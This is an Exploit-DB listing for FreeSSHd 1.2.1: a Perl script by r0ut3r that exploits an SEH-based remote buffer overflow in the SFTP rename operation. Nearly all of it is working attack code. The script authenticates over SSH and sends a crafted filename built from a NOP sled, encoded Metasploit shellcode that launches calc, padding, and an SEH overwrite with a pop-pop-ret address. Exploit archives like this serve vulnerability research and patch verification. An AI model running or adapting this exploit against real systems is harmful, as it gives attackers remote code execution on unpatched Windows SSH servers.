freeSSHd 1.2.1 - 'rename' Remote Buffer Overflow (SEH)

EDB-ID:

8295

Author:

r0ut3r

Type:

remote

Platform:

Windows

Published:

2009-03-27

# FreeSSHd 1.2.1 (rename) Remote Buffer Overflow Exploit
#
# Advisory: http://www.bmgsec.com.au/advisory/45/
# Original: http://www.bmgsec.com.au/advisory/32/
# Related : http://www.bmgsec.com.au/advisory/42/
#
# Test box: WinXP Pro SP2 English
#
# Exploit code for a vulnerability I discovered sometime
# ago in FreeSSHd 1.2.1. This code should be run from a 
# user titled "root", or adjust the payload for your 
# username. I've left space for adjustments. Up to the
# first six NOPs can be used (inclusive). 
#
# The code exploits a vulnerability in the SFTP Rename
# operation. The vulnerability was patched in 1.2.2
#
# 00416F98  50             PUSH EAX                      
# 00416F99  8D85 B8FEFFFF  LEA EAX,DWORD PTR SS:[EBP-148]
# 00416F9F  50             PUSH EAX                      
# 00416FA0  E8 45B50400    CALL <JMP.&MSVCRT.strcpy>     
#
#
# Written and discovered by:
# r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)

use Net::SSH2;

my $user = "root";
my $pass = "yahh";

my $ip = "127.0.0.1";
my $port = 22;

my $ssh2 = Net::SSH2->new();

print "[+] Connecting...\n";
$ssh2->connect($ip, $port) || die "[-] Unable to connect!\n";
$ssh2->auth_password($user, $pass) || "[-] Incorrect credentials\n";
print "[+] Sending payload\n";

$nop = "\x90";
$padding = 'A' x 105;

my $SEH = "\x21\x11\x40\x00"; # pop, pop, ret - 0x00401121 (Universal - freeSSHdServer.exe)
my $nextSEH = "\xEB\xF0\x90\x90"; # jmp short 240, nop, nop

$mShellcode = "\xE9\xF2\xFE\xFF\xFF";

# win32_exec -  EXITFUNC=process CMD=calc Size=160 Encoder=PexFnstenvSub - metasploit.com
my $shellcode =
"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x02".
"\x28\x29\x10\x83\xeb\xfc\xe2\xf4\xfe\xc0\x6d\x10\x02\x28\xa2\x55".
"\x3e\xa3\x55\x15\x7a\x29\xc6\x9b\x4d\x30\xa2\x4f\x22\x29\xc2\x59".
"\x89\x1c\xa2\x11\xec\x19\xe9\x89\xae\xac\xe9\x64\x05\xe9\xe3\x1d".
"\x03\xea\xc2\xe4\x39\x7c\x0d\x14\x77\xcd\xa2\x4f\x26\x29\xc2\x76".
"\x89\x24\x62\x9b\x5d\x34\x28\xfb\x89\x34\xa2\x11\xe9\xa1\x75\x34".
"\x06\xeb\x18\xd0\x66\xa3\x69\x20\x87\xe8\x51\x1c\x89\x68\x25\x9b".
"\x72\x34\x84\x9b\x6a\x20\xc2\x19\x89\xa8\x99\x10\x02\x28\xa2\x78".
"\x3e\x77\x18\xe6\x62\x7e\xa0\xe8\x81\xe8\x52\x40\x6a\x56\xf1\xf2".
"\x71\x40\xb1\xee\x88\x26\x7e\xef\xe5\x4b\x48\x7c\x61\x28\x29\x10";

my $payload = $nop x 6 . $shellcode . $padding . $mShellcode . $nop x 9 . $nextSEH . $SEH;

my $sftp = $ssh2->sftp();
$sftp->rename($payload, 'B');

print "[+] Sent";
$ssh2->disconnect;

# milw0rm.com [2009-03-27]